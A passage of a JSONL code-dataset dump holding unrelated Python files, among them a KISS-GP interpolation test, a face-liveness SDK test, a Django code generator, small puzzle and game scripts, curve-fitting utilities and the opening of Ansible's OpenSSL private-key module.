2)] = ((-0.5 * d[(1 < d) & (d <= 2)] + 2.5) * d[(1 < d) & (d <= 2)] - 4) * d[\n (1 < d) & (d <= 2)] + 2\n\n return w\n\n# construct training points according to 4.1 in KISS-GP\nN = 1000\nX = np.sqrt(25)*np.random.standard_normal(N)\nprint(X.max())\nprint(X.min())\nX.sort()\n\n# inducing points\nZ = np.linspace(X.min()-2,X.max()+2,40)\n\n# interpolation weight matrix\nindices, values, shape = regular_grid_interpolation([Z],np.reshape(X, (-1,1)))\nW = np.zeros(shape)\nW[indices.astype(int)[:,0],indices.astype(int)[:,1]] = np.reshape(values, (-1))\nprint(W)\n\nW2 = kernel_interpolation(Z,X)\nprint(W2)\nKx = RBF(X.reshape(-1,1), gamma = 0.01) # RBF kernel using training points\nKz = RBF(Z.reshape(-1,1), gamma = 0.01) # RBF kernel using inducing points\nK_ski = np.dot(W,np.dot(Kz,W.transpose())) # SKI kernel according to KISS-GP\n\n# plot K_true, K_ski and |K_true - K_ski| using pcolormesh, result similar to KISS-GP article\n# However, not clear which gamma they use or how they choose the inducing 
points\nplt.pcolormesh(Kx)\nplt.colorbar()\nplt.title('$K_{true}$')\nplt.figure()\nplt.pcolormesh(K_ski)\nplt.colorbar()\nplt.title('$K_{SKI}$')\nplt.figure()\nplt.pcolormesh(np.abs(Kx-K_ski))\nplt.colorbar()\nplt.title('$|K_{true} - K_{SKI}|$')\nplt.show()","sub_path":"test_interpolation.py","file_name":"test_interpolation.py","file_ext":"py","file_size_in_byte":7160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"69603778","text":"import os\n\nMENUS = [\n 'members',\n ('research', ['methods', 'publications']),\n ('projects', ['topics', 'FAQ']),\n 'courses',\n 'software',\n 'contact',\n ('FAQ', ['datamining', 'admission'])\n]\n\nSERVER = {\n 'host': '0.0.0.0',\n 'port': 8088,\n 'debug': True,\n}\n\nAPP_URL = 'http://dmlab.snu.ac.kr'\nAPP_ROOT = os.path.dirname(os.path.abspath(__file__))\nAPP_STATIC = os.path.join(APP_ROOT, 'static')\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"264278734","text":"import unittest\nimport argparse\nimport sys\nimport os\nfrom license_helper import make_activation, ActivationLicenseError\n\n# if FaceEngine is not installed within the system, add the directory with FaceEngine*.so to system paths\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-b\", \"--bind-path\", type=str,\n help=\"path to dir with FaceEngine*.so file - binding of luna-sdk\")\n\nargs = parser.parse_args()\n\nif len(sys.argv) == 1 or not args.bind_path or not os.path.isdir(args.bind_path):\n parser.print_help(sys.stderr)\n sys.exit(1)\n\npath_to_binding = args.bind_path\nprint(\"Directory {0} with python bindings of FaceEngine was included\".format(path_to_binding))\nprint(sys.argv)\n\nsys.path.append(path_to_binding)\n\n# if FaceEngine is installed only this string of code is required for module importing\nimport FaceEngine as fe\n\n# erase two first arguments for unittest argument parsing\ndel(sys.argv[1])\ndel(sys.argv[1])\n\n\ndef createLivenessEngine(preparedConfig):\n faceEngine = fe.createFaceEngine(\"data\")\n faceEngine.setSettingsProvider(preparedConfig)\n if not make_activation(faceEngine):\n raise ActivationLicenseError(\"License is not activated!\")\n liveness_engine = fe.createLivenessEngine(faceEngine, \"data\")\n return liveness_engine\n\ntest_data_path = \"testData\"\ndataPath = \"data\"\n\ndef print_landmarks(landmarks, message=\"\"):\n print(message)\n for i in range(len(landmarks)):\n print(landmarks[i])\n\n#implementation\nprint(fe.LA_PITCH_DOWN)\nprint(fe.LA_PITCH_UP)\nprint(fe.LA_YAW_LEFT)\nprint(fe.LA_YAW_RIGHT)\nprint(fe.LA_SMILE)\nprint(fe.LA_MOUTH)\nprint(fe.LA_EYEBROW)\nprint(fe.LA_EYE)\nprint(fe.LA_ZOOM)\nprint(fe.LA_INFRARED)\nprint(fe.LA_EYEBROW)\n\nprint(fe.CLA_DEPTH)\n\nprint(fe.LSDKError.Ok)\nprint(fe.LSDKError.NotInitialized)\nprint(fe.LSDKError.NotReady)\nprint(fe.LSDKError.PreconditionFailed)\nprint(fe.LSDKError.Internal)\nangles = fe.Angles()\nangles.yaw = 10\nangles.pitch = 20\nangles.roll = 30\nprint(\"angles {0}, {1} {2}\".format(angles.yaw, angles.pitch, angles.roll))\nscores = fe.Scores()\nscores.smile = 0.3\nscores.mouth = 0.3\nscores.eyebrow = 0.4\nprint(\"scores {0}, {1} {2}\".format(scores.smile, scores.mouth, scores.eyebrow))\neye_states = fe.EyeStates()\neye_states.left = 0\neye_states.right = 1\nprint(\"eye_states {0}, {1} \".format(eye_states.left, eye_states.right))\n\nconfigPath = os.path.join(\"data\", 
\"faceengine.conf\")\nconfig = fe.createSettingsProvider(configPath)\nliveness_engine = createLivenessEngine(config)\nliveness = liveness_engine.createLiveness(fe.LA_INFRARED)\ncomplex_liveness = liveness_engine.createComplexLiveness(fe.CLA_DEPTH)\nimage = fe.Image()\nimage_path = test_data_path + \"/image1.ppm\"\nerr = image.load(image_path)\nif err.isError:\n exit(-1)\nerr, success = liveness.update(image)\nresult_det, detection = liveness.getDetection()\nif result_det:\n print(detection)\nelse:\n print(\"detection was not got\")\n\n\nresult_warp, warp = liveness.getWarp()\nprint(\"result_warp success:\", result_warp, warp.getWidth(), warp.getHeight())\nresult, landmarks68 = liveness.getLandmarks68()\nprint(\"landmarks68 success:\", result)\nresult, landmarks5 = liveness.getLandmarks5()\nprint_landmarks(landmarks5, \"landmarks5:\")\nprint(\"landmarks5 success:\", result)\nresult, irisLandmarks = liveness.getIrisLandmarks()\nprint(\"Irislandmarks success:\", result)\nresult, angles = liveness.getAngles()\nprint(\"Angles success:\", result)\nresult, scores = liveness.getScores()\nprint(\"Scores success:\", result)\nresult, eye_states = liveness.getEyestates()\nprint(\"Eye_states success:\", result)\nprint(err.what, success)\nliveness.reset()\n\nresult, detection = complex_liveness.getDetection()\nresult, warp = complex_liveness.getWarp()\nresult, landmarks68 = complex_liveness.getLandmarks68()\nresult, landmarks5 = complex_liveness.getLandmarks5()\nresult, irisLandmarks = complex_liveness.getIrisLandmarks()\nresult, angles = complex_liveness.getAngles()\nresult, scores = complex_liveness.getScores()\nresult, eye_states = complex_liveness.getEyestates()\ncomplex_liveness.reset()\n\n\nclass TestFaceEngineLiveness(unittest.TestCase):\n\n def simpleLivenessTest(self, type, path):\n configPath = os.path.join(\"data\", \"faceengine.conf\")\n config = fe.createSettingsProvider(configPath)\n config.setValue(\"system\", \"defaultDetectorType\", \"FaceDetV1\")\n liveness_engine = createLivenessEngine(config)\n liveness = liveness_engine.createLiveness(type)\n image_list = fe.loadFrameSequence(path)\n result = None\n success = False\n for image in image_list:\n if not image.isValid():\n print(\"Image is not valid\")\n continue\n result, success = liveness.update(image)\n self.assertTrue(result.isOk)\n self.assertTrue(success)\n\n def complexLivenessTest(self, type, color_path, depth_path):\n configPath = os.path.join(\"data\", \"faceengine.conf\")\n config = fe.createSettingsProvider(configPath)\n config.setValue(\"system\", \"defaultDetectorType\", \"FaceDetV1\")\n config.setValue(\"DepthEstimator::Settings\", \"zeroDepthThreshold\", 0.5)\n liveness_engine = createLivenessEngine(config)\n complex_liveness = liveness_engine.createComplexLiveness(type)\n color_image_list = fe.loadFrameSequence(color_path)\n depth_image_list = fe.loadFrameSequence(depth_path)\n result = None\n success = False\n self.assertEqual(len(color_image_list), len(depth_image_list))\n for i, _ in enumerate(color_image_list):\n if not color_image_list[i].isValid():\n print(\"Image is not valid\")\n continue\n if not depth_image_list[i].isValid():\n print(\"Image is not valid\")\n continue\n result, success = complex_liveness.update(color_image_list[i], depth_image_list[i])\n self.assertTrue(result.isOk)\n self.assertTrue(success)\n\n def test_liveness(self):\n self.simpleLivenessTest(fe.LA_INFRARED, test_data_path + \"/infrared.bin\")\n self.simpleLivenessTest(fe.LA_YAW_RIGHT, test_data_path + \"/yawright.bin\")\n 
self.simpleLivenessTest(fe.LA_YAW_LEFT, test_data_path + \"/yawleft.bin\")\n self.simpleLivenessTest(fe.LA_PITCH_UP, test_data_path + \"/pitchup.bin\")\n self.simpleLivenessTest(fe.LA_PITCH_DOWN, test_data_path + \"/pitchdown.bin\")\n self.simpleLivenessTest(fe.LA_MOUTH, test_data_path + \"/mouth.bin\")\n self.simpleLivenessTest(fe.LA_EYEBROW, test_data_path + \"/eyebrow.bin\")\n self.simpleLivenessTest(fe.LA_EYE, test_data_path + \"/eye.bin\")\n self.simpleLivenessTest(fe.LA_ZOOM, test_data_path + \"/zoom.bin\")\n self.simpleLivenessTest(fe.LA_SMILE, test_data_path + \"/smile.bin\")\n self.complexLivenessTest(fe.CLA_DEPTH, test_data_path + \"/color.bin\", test_data_path + \"/depth.bin\")\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"tests/test_liveness.py","file_name":"test_liveness.py","file_ext":"py","file_size_in_byte":6888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"91008628","text":"import os\n\ndef write_template_files(lstclassnames):\n\touttxt = '''\\\n\n\n\n\n\n\n{% block content %}\n{% endblock %}\n\n\n'''\n\tf=open('templates%sbase.html' % (os.sep, ), 'w')\n\tf.write(outtxt)\n\tf.close()\n\n\tfor iter in lstclassnames:\n\t\touttxt = '''\\\n{% extends \"base.html\" %}\n{% block content %}\n
\n{% csrf_token %}\n{{ form.as_p }}\n\n
\n{% endblock %}\t\n'''.replace('{0}', iter.lower()) #.format(iter.lower(), iter)\n\t\tf=open('templates%sedit_%s.html' % (os.sep, iter.lower()), 'w')\n\t\tf.write(outtxt)\n\t\tf.close()\n\t\t\n\t\touttxt = '''\\\n{% extends \"base.html\" %}\n{% load render_table from django_tables2 %}\n{% block content %}\n\n{% render_table data %}\n{% endblock %}\n'''\n\t\tf=open('templates%slist_%s.html' % (os.sep, iter.lower()), 'w')\n\t\tf.write(outtxt)\n\t\tf.close()\n\ndef make_forms_file(lstclassnames):\n\tretval = '''\\\nfrom django.forms import ModelForm\nfrom {0}.models import {1}\n\nclass BaseForm(ModelForm):\n\trequired_css_class='required'\n\tclass Meta:\n\t\tabstract=True\n\n'''.format(\n\t\tos.path.dirname(os.path.realpath(__file__)).split(os.sep)[-1], #should we use os.getcwd instead of dirname of realpath?\n\t\t', '.join(lstclassnames)\n\t)\n\tfor iter in lstclassnames:\n\t\tretval = retval + '''\\\nclass {0}Form(BaseForm):\n\tclass Meta:\n\t\tmodel={0}\n\n'''.format(iter)\n\treturn retval\n\ndef make_views_file(lstclassnames):\n\tretval = '''\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom {0}.forms import {2}\nfrom {0}.models import {1}\nfrom django.shortcuts import render\nfrom django.core.urlresolvers import reverse\nfrom {0} import forms\n\ndef home(request):\n\treturn HttpResponse('Home page under construction', mimetype='text/plain')\n\n'''.format(\n\t\tos.path.dirname(os.path.realpath(__file__)).split(os.sep)[-1],\n\t\t', '.join(lstclassnames),\n\t\t'Form, '.join(lstclassnames)\n\t)\n\tfor iter in lstclassnames:\n\t\tretval = retval + '''\ndef {0}_edit(request, id=0):\n\tif int(id)>0:\n\t\tobj={1}.objects.get(id=id)\n\t\tform=forms.{1}Form(initial=obj.__dict__)\n\t\tdel(obj)\n\telse:\n\t\tform=forms.{1}Form()\n\treturn render(request, 'edit_{0}.html', locals())\n\ndef {0}_save(request, id=0):\n\tform=forms.{1}Form(request.POST)\n\tif int(id)>0:\n\t\tform=forms.{1}Form(request.POST, instance={1}.objects.get(id=id))\n\tif form.is_valid():\n\t\t#objid=int(form.cleaned_data['id'])\n\t\t#if objid>0:\n\t\t#\tform.instance={1}.objects.get(id=objid)\n\t\tform.save()\n\t\treturn HttpResponseRedirect(reverse('{0}_list'))\n\telse:\n\t\treturn render(request, 'edit_{0}.html', locals())\n\t\ndef {0}_list(request):\n\treturn render(request, 'list_{0}.html', {{'data': {1}.objects.all()}})\n\t\ndef {0}_remove(request):\n\tpass\n\t\\\n'''.format(iter.lower(), iter)\n\treturn retval\n\ndef make_urls_file(lstclassnames):\n\tretval = ''\n\tretval = retval + 'from {0} import views'.format(\n\t\tos.path.dirname(os.path.realpath(__file__)).split(os.sep)[-1]\n\t) + os.linesep\n\tretval = retval + '''\\\nfrom django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n'''\n\tretval = retval + '''\\\n\turl(r\\'^$\\', views.home, name=\\'home\\'),\n'''\n\tfor iter in lstclassnames:\n\t\tretval = retval + 'url(r\\'^{0}/edit$\\', views.{0}_edit, name=\\'{0}_edit\\'),'.format(iter.lower()) + os.linesep\n\t\tretval = retval + 'url(r\\'^{0}/edit/(?P\\d+)$\\', views.{0}_edit, name=\\'{0}_edit\\'),'.format(iter.lower()) + os.linesep\n\t\tretval = retval + 'url(r\\'^{0}/index$\\', views.{0}_list, name=\\'{0}_list\\'),'.format(iter.lower()) + os.linesep\n\t\tretval = retval + 'url(r\\'^{0}/delete$\\', views.{0}_remove, name=\\'{0}_remove\\'),'.format(iter.lower()) + os.linesep\n\t\tretval = retval + 'url(r\\'^{0}/save$\\', views.{0}_save, name=\\'{0}_save\\'),'.format(iter.lower()) + os.linesep\n\t\tretval = retval + 
'url(r\'^{0}/save/(?P<id>\d+)$\', views.{0}_save, name=\'{0}_save\'),'.format(iter.lower()) + os.linesep\n\t\tretval = retval + os.linesep\n\tretval = retval + ')'\n\treturn retval\n\ndef make_admin_file(lstclassnames):\n\tretval = '''\\\nfrom django.contrib import admin\nfrom {0}.models import {1}\n\nclasses=[{1}]\n\nfor iterclass in classes:\n\tadmin.site.register(iterclass)\\\n'''.format(\n\t\tos.path.dirname(os.path.realpath(__file__)).split(os.sep)[-1], #should we use os.getcwd instead of dirname of realpath?\n\t\t', '.join(lstclassnames)\n\t)\n\treturn retval\n\nimport re\n\n#matchobj = re.search(r'pat', 'str')\n#print(matchobj.group(0))\n\n#match looks only at the beginning of the string\n#search is a proper search\n\ndef writetofile(filename, content):\n\tf=open(filename, 'w')\n\tf.write(content)\n\tf.close()\n\ndef generate_code(modelsfile='models.py', viewsfile=None, urlsfile=None, adminfile=None, formsfile=None):\n\tcre = re.compile(r'class +(.*) *'+re.escape('('))\n\tmodelsfile = open(modelsfile, 'r')\n\tlstclassnames = []\n\tfor line in modelsfile:\n\t\tcap = cre.match(line)\n\t\tif cap is not None:\n\t\t\tclassname = cap.group(1)\n\t\t\tif not classname.endswith('Base'): #ignore base classes\n\t\t\t\tlstclassnames.append(classname)\n\tif len(lstclassnames)>0:\n\t\tif urlsfile is not None:\n\t\t\twritetofile(urlsfile, make_urls_file(lstclassnames))\n\t\tif viewsfile is not None:\n\t\t\twritetofile(viewsfile, make_views_file(lstclassnames))\n\t\tif adminfile is not None:\n\t\t\twritetofile(adminfile, make_admin_file(lstclassnames))\n\t\tif formsfile is not None:\n\t\t\twritetofile(formsfile, make_forms_file(lstclassnames))\n\t\twrite_template_files(lstclassnames)\n\tmodelsfile.close()\n\nif __name__=='__main__':\n\tgenerate_code('models.py', 'views.py', 'urls.py', 'admin.py', 'forms.py')","sub_path":"srcgen.py","file_name":"srcgen.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"428035244","text":"from django.urls import path\nfrom rest_framework import routers\n\nfrom users import views\n\nurlpatterns = [\n    path('signup/', views.signup, name='signup'),\n    path('login/', views.login, name='login')\n]\n\nrouter = routers.DefaultRouter()\nrouter.register(r'profiles', views.ProfileViewSet, base_name='auth')\n\nurlpatterns += router.urls\n","sub_path":"my_food/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"473252286","text":"\"\"\"\nThe roads of New Manhattan are laid out as follows. Every hundred meters an avenue runs from south to north,\nand every hundred meters a street runs from west to east. Avenues and streets are numbered with integers.\nSmaller numbers correspond to the western avenues and the southern streets. Thus one can set up\na rectangular coordinate system so that the point (x, y) lies at the intersection of the x-th avenue and the y-th street.\nIt is easy to see that to get from point (x1, y1) to point (x2, y2) in New Manhattan one has to walk\n|x2 − x1| + |y2 − y1| blocks. This quantity is called the Manhattan distance between the points (x1, y1) and (x2, y2).\n\nMisha lives in New Manhattan and goes for a run around the city every morning. He runs out of his home,\nwhich is located at the point (0, 0), and follows a random route.\nEvery minute Misha either stays at the same intersection as a minute before, or moves one block\nin any direction. To avoid getting lost, Misha takes along a navigator that tells him every t minutes\nwhich point he is at. Unfortunately, the navigator does not show Misha's exact position: it may show any of the points\nwhose Manhattan distance to Misha does not exceed d.\n\nAfter t × n minutes from the start of the run, having received the n-th message from the navigator, Misha decided it was time to run home.\nTo do so, he wants to figure out at which points he might be. Help Misha do this.\n\n---\nInput format\nThe first line of the input file contains the numbers t, d and n (1 ≤ t ≤ 100, 1 ≤ d ≤ 100, 1 ≤ n ≤ 100).\nThe next n lines describe the data received from the navigator. Line number i contains the numbers x_i and y_i — the data received\nfrom the navigator t_i minutes after the start of the run.\n\nOutput format\nIn the first line of the output file print the number m — the number of points where Misha might be.\nThen print m pairs of numbers — the coordinates of those points. The points may be printed in any order.\nIt is guaranteed that the navigator is working correctly and that there is at least one point where Misha might be.\n\"\"\"\n\n# NON-OPTIMAL SOLUTION\n# A less resource- and time-demanding algorithm would use 4 linear inequalities to describe the admissible region.\nt, d, n = map(int, input().split())\n\ncoords = []\nfor _ in range(n):\n    coords.append(tuple(map(int, input().split())))\n\nsteps = t*n  # max possible total distance along each coordinate\n\nall_ends = set()\nfor x in range(0, steps+1):\n    for y in range(steps-x, -steps+x-1, -1):\n        all_ends.add((x, y))\nfor x in range(-1, -steps-1, -1):\n    for y in range(steps+x, -steps-x-1, -1):\n        all_ends.add((x, y))\n\n# initial_diamond = set()  # build a diamond at the origin\n# initial_diamond.add((0, 0))\n# for x in range(0, t+1):\n#     for y in range(t-x, -t+x-1, -1):\n#         initial_diamond.add((x, y))\n# for x in range(-1, -t-1, -1):\n#     for y in range(t+x, -t-x-1, -1):\n#         initial_diamond.add((x, y))\n\nnew_ends = set()\nfx, fy = coords[0]\nfor x in range(0, d+1):\n    for y in range(d-x, -d+x-1, -1):\n        new_ends.add((x+fx, y+fy))\nfor x in range(-1, -d-1, -1):\n    for y in range(d+x, -d-x-1, -1):\n        new_ends.add((x+fx, y+fy))\nnew_ends = new_ends.intersection(all_ends)\n\nfor fx, fy in coords[1:]:\n    old_ends = new_ends.copy()\n    for xx, yy in old_ends:  # grow the diamond by t in every direction\n        for x in range(0, t+1):\n            for y in range(t-x, -t+x-1, -1):\n                new_ends.add((x+xx, y+yy))\n        for x in range(-1, -t-1, -1):\n            for y in range(t+x, -t-x-1, -1):\n                new_ends.add((x+xx, y+yy))\n\n    new_diamond = set()  # possible positions once this navigator reading is known\n    for x in range(0, d+1):\n        for y in range(d-x, -d+x-1, -1):\n            new_diamond.add((x+fx, y+fy))\n    for x in range(-1, -d-1, -1):\n        for y in range(d+x, -d-x-1, -1):\n            new_diamond.add((x+fx, y+fy))\n\n    new_ends = new_ends.intersection(new_diamond)\n\nfin = all_ends.intersection(new_ends)\nprint(len(fin))\nfor kek in fin:\n    print(\" \".join(map(str, kek)))\n","sub_path":"03_Sets/10_Manhattan_Nav.py","file_name":"10_Manhattan_Nav.py","file_ext":"py","file_size_in_byte":5632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"599084269","text":"import random\r\n\r\ndef game(comp, you):\r\n    if (comp == you):\r\n        return None\r\n    elif (comp == 's'):\r\n        if (you == 'w'):\r\n            return False\r\n        elif 
(you == 'g'):\r\n return True\r\n elif (comp == 'w'):\r\n if (you == 's'):\r\n return True\r\n elif (you == 'g'):\r\n return False\r\n elif (comp == 'g'):\r\n if (you == 's'):\r\n return False\r\n elif (you == 'w'):\r\n return True\r\n\r\n\r\nprint ('Computer Turn: Snake(s) or Water(w) or Gun(g)? ')\r\n\r\nrand = random.randint(1, 3)\r\nif (rand == 1):\r\n comp = 's'\r\nelif (rand == 2):\r\n comp = 'w'\r\nelif (rand == 3):\r\n comp = 'g'\r\n\r\nyou = input('Player 2 Turn: Snake(s) or Water(w) or Gun(g)? ')\r\na = game(comp, you)\r\n\r\nprint (f'Computer choose {comp}')\r\nprint (f'You choose {you}')\r\n\r\nif (a == None):\r\n print ('The game is a tie!')\r\nelif(a):\r\n print ('You Win!')\r\nelse:\r\n print ('You Lose!')\r\n","sub_path":"68_Snake_water_gun_game.py","file_name":"68_Snake_water_gun_game.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"130075363","text":"import inspect\nimport numbers\n\nimport numpy as np\nimport scipy.odr as odr\nimport scipy.optimize as opt\nfrom pycertainties import Val\n\n\ndef rows_to_list(string_data):\n return [row.split() for row in string_data.strip().split(\"\\n\")]\n\n\ndef rows_to_numpy(string_data, sep=\",\"):\n if sep:\n data = [row.split(sep) for row in string_data.strip().split(\"\\n\")]\n else:\n data = [row.split() for row in string_data.strip().split(\"\\n\")]\n return np.array(data, np.float64)\n\n\ndef cols_to_numpy(string_data, sep=None):\n return rows_to_numpy(string_data, sep).transpose()\n\n\ndef pprint_matrix(matrix, column_lables=None, *, title=None, sep=\"|\", width=20, fwidth=10):\n \"\"\"\n A pretty printer for 2d arrays\n\n matrix: The 2d array\n column_labels: Labels for the columns while printing\n \"\"\"\n if len(matrix.shape) != 2:\n raise ValueError\n\n rows, cols = matrix.shape\n if title:\n spaces = width + (width + 1) * (cols - 1)\n title_string = f\"{{:^{spaces}}}\"\n print(title_string.format(title))\n if column_lables:\n string = sep.join([f\"{{:^{width}}}\"] * cols)\n print(string.format(*column_lables))\n for row in range(rows):\n\n def fmt_str(val):\n return (\n f\"{{:^{width}.{fwidth}g}}\"\n if isinstance(val, numbers.Real) and not isinstance(val, int)\n else f\"{{:^{width}}}\"\n )\n\n strings = [fmt_str(val) for val in matrix[row]]\n string = sep.join(strings)\n print(string.format(*matrix[row]))\n\n\ndef _remove_zeros(xs, ys, dxs, dys):\n def filtered(values):\n if values is None:\n return values\n return [\n val for ind, val in enumerate(values) if (dxs is None or dxs[ind] != 0) and (dys is None or dys[ind] != 0)\n ]\n\n return filtered(xs), filtered(ys), filtered(dxs), filtered(dys)\n\n\ndef _fit_func(func, xs, ys, dxs=None, dys=None, guesses=None):\n if dxs is None:\n optimal, covarience = opt.curve_fit(func, xs, ys, sigma=dys, p0=guesses, maxfev=3000)\n else:\n xs, ys, dxs, dys = _remove_zeros(xs, ys, dxs, dys)\n data = odr.RealData(xs, ys, dxs, dys)\n new_func = lambda beta, x: func(x, *beta)\n sig = inspect.signature(func)\n options = len(sig.parameters) - 1\n model = odr.Model(new_func)\n odr_obj = odr.ODR(data, model, beta0=[1 for _ in range(options)] if guesses is None else guesses)\n res = odr_obj.run()\n optimal, covarience = res.beta, res.cov_beta\n\n stddev = np.sqrt(np.diag(covarience))\n return tuple(Val(value, uncertainty) for value, uncertainty in zip(optimal, stddev))\n\n\ndef fit_func(func, xs, ys, dxs=None, dys=None, limits=None, guesses=None):\n if limits is not None:\n trim = lambda values: 
values[limits] if values is not None else None\n values = [trim(values) for values in (xs, ys, dxs, dys)]\n else:\n values = (xs, ys, dxs, dys)\n return _fit_func(func, *values, guesses=guesses)\n\n\ndef r_squared(func, xs, ys, parameters):\n residuals = ys - func(xs, *parameters)\n residual_sum_of_squares = np.sum(residuals ** 2)\n total_sum_of_squares = np.sum((ys - np.mean(ys)) ** 2)\n return 1 - (residual_sum_of_squares / total_sum_of_squares)\n","sub_path":"venv/Lib/site-packages/matplotobjlib/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"420739134","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Copyright: (c) 2016, Yanis Guenane \n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nDOCUMENTATION = r'''\n---\nmodule: openssl_privatekey\nshort_description: Generate OpenSSL private keys\ndescription:\n - This module allows one to (re)generate OpenSSL private keys.\nauthor:\n - Yanis Guenane (@Spredzy)\n - Felix Fontein (@felixfontein)\noptions:\n state:\n description:\n - Whether the private key should exist or not, taking action if the state is different from what is stated.\n type: str\n default: present\n choices: [ absent, present ]\n force:\n description:\n - Should the key be regenerated even if it already exists.\n type: bool\n default: no\n path:\n description:\n - Name of the file in which the generated TLS/SSL private key will be written. It will have C(0600) mode\n if I(mode) is not explicitly set.\n type: path\n required: true\n format:\n version_added: '1.0.0'\n format_mismatch:\n version_added: '1.0.0'\n backup:\n description:\n - Create a backup file including a timestamp so you can get\n the original private key back if you overwrote it with a new one by accident.\n type: bool\n default: no\n return_content:\n description:\n - If set to C(yes), will return the (current or generated) private key's content as I(privatekey).\n - Note that especially if the private key is not encrypted, you have to make sure that the returned\n value is treated appropriately and not accidentally written to logs etc.! Use with care!\n - Use Ansible's I(no_log) task option to avoid the output being shown. 
See also\n U(https://docs.ansible.com/ansible/latest/reference_appendices/faq.html#how-do-i-keep-secret-data-in-my-playbook).\n type: bool\n default: no\n version_added: '1.0.0'\n regenerate:\n version_added: '1.0.0'\nextends_documentation_fragment:\n- ansible.builtin.files\n- community.crypto.module_privatekey\nseealso:\n- module: community.crypto.openssl_privatekey_pipe\n- module: community.crypto.openssl_privatekey_info\n'''\n\nEXAMPLES = r'''\n- name: Generate an OpenSSL private key with the default values (4096 bits, RSA)\n community.crypto.openssl_privatekey:\n path: /etc/ssl/private/ansible.com.pem\n\n- name: Generate an OpenSSL private key with the default values (4096 bits, RSA) and a passphrase\n community.crypto.openssl_privatekey:\n path: /etc/ssl/private/ansible.com.pem\n passphrase: ansible\n cipher: aes256\n\n- name: Generate an OpenSSL private key with a different size (2048 bits)\n community.crypto.openssl_privatekey:\n path: /etc/ssl/private/ansible.com.pem\n size: 2048\n\n- name: Force regenerate an OpenSSL private key if it already exists\n community.crypto.openssl_privatekey:\n path: /etc/ssl/private/ansible.com.pem\n force: yes\n\n- name: Generate an OpenSSL private key with a different algorithm (DSA)\n community.crypto.openssl_privatekey:\n path: /etc/ssl/private/ansible.com.pem\n type: DSA\n'''\n\nRETURN = r'''\nsize:\n description: Size (in bits) of the TLS/SSL private key.\n returned: changed or success\n type: int\n sample: 4096\ntype:\n description: Algorithm used to generate the TLS/SSL private key.\n returned: changed or success\n type: str\n sample: RSA\ncurve:\n description: Elliptic curve used to generate the TLS/SSL private key.\n returned: changed or success, and I(type) is C(ECC)\n type: str\n sample: secp256r1\nfilename:\n description: Path to the generated TLS/SSL private key file.\n returned: changed or success\n type: str\n sample: /etc/ssl/private/ansible.com.pem\nfingerprint:\n description:\n - The fingerprint of the public key. 
Fingerprint will be generated for each C(hashlib.algorithms) available.\n - The PyOpenSSL backend requires PyOpenSSL >= 16.0 for meaningful output.\n returned: changed or success\n type: dict\n sample:\n md5: \"84:75:71:72:8d:04:b5:6c:4d:37:6d:66:83:f5:4c:29\"\n sha1: \"51:cc:7c:68:5d:eb:41:43:88:7e:1a:ae:c7:f8:24:72:ee:71:f6:10\"\n sha224: \"b1:19:a6:6c:14:ac:33:1d:ed:18:50:d3:06:5c:b2:32:91:f1:f1:52:8c:cb:d5:75:e9:f5:9b:46\"\n sha256: \"41:ab:c7:cb:d5:5f:30:60:46:99:ac:d4:00:70:cf:a1:76:4f:24:5d:10:24:57:5d:51:6e:09:97:df:2f:de:c7\"\n sha384: \"85:39:50:4e:de:d9:19:33:40:70:ae:10:ab:59:24:19:51:c3:a2:e4:0b:1c:b1:6e:dd:b3:0c:d9:9e:6a:46:af:da:18:f8:ef:ae:2e:c0:9a:75:2c:9b:b3:0f:3a:5f:3d\"\n sha512: \"fd:ed:5e:39:48:5f:9f:fe:7f:25:06:3f:79:08:cd:ee:a5:e7:b3:3d:13:82:87:1f:84:e1:f5:c7:28:77:53:94:86:56:38:69:f0:d9:35:22:01:1e:a6:60:...:0f:9b\"\nbackup_file:\n description: Name of backup file created.\n returned: changed and if I(backup) is C(yes)\n type: str\n sample: /path/to/privatekey.pem.2019-03-09@11:22~\nprivatekey:\n description:\n - The (current or generated) private key's content.\n - Will be Base64-encoded if the key is in raw format.\n returned: if I(state) is C(present) and I(return_content) is C(yes)\n type: str\n version_added: '1.0.0'\n'''\n\nimport os\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils._text import to_native\n\nfrom ansible_collections.community.crypto.plugins.module_utils.io import (\n load_file_if_exists,\n write_file,\n)\n\nfrom ansible_collections.community.crypto.plugins.module_utils.crypto.basic import (\n OpenSSLObjectError,\n)\n\nfrom ansible_collections.community.crypto.plugins.module_utils.crypto.support import (\n OpenSSLObject,\n)\n\nfrom ansible_collections.community.crypto.plugins.module_utils.crypto.module_backends.privatekey import (\n select_backend,\n get_privatekey_argument_spec,\n)\n\n\nclass PrivateKeyModule(OpenSSLObject):\n\n def __init__(self, module, module_backend):\n super(PrivateKeyModule, self).__init__(\n module.params['path'],\n module.params['state'],\n module.params['force'],\n module.check_mode,\n )\n self.module_backend = module_backend\n self.return_content = module.params['return_content']\n if self.force:\n module_backend.regenerate = 'always'\n\n self.backup = module.params['backup']\n self.backup_file = None\n\n if module.params['mode'] is None:\n module.params['mode'] = '0600'\n\n 